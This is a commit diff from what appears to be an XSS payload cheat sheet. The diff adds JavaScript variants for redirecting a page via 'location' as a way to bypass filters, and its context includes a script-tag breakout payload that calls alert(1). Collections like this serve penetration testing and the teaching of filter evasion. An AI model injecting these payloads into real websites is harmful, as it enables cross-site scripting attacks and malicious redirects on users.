LaTeX display code + XSS location alternative

This commit is contained in:
Swissky
2018-08-01 21:19:18 +02:00
parent dcc5ebd3b6
commit 644724396f
3 changed files with 17 additions and 0 deletions

View File

@@ -424,6 +424,14 @@ foo="text </script><script>alert(1)</script>";
</script>
```
Bypass using an alternate way to redirect
```javascript
location="http://google.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
```
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
```javascript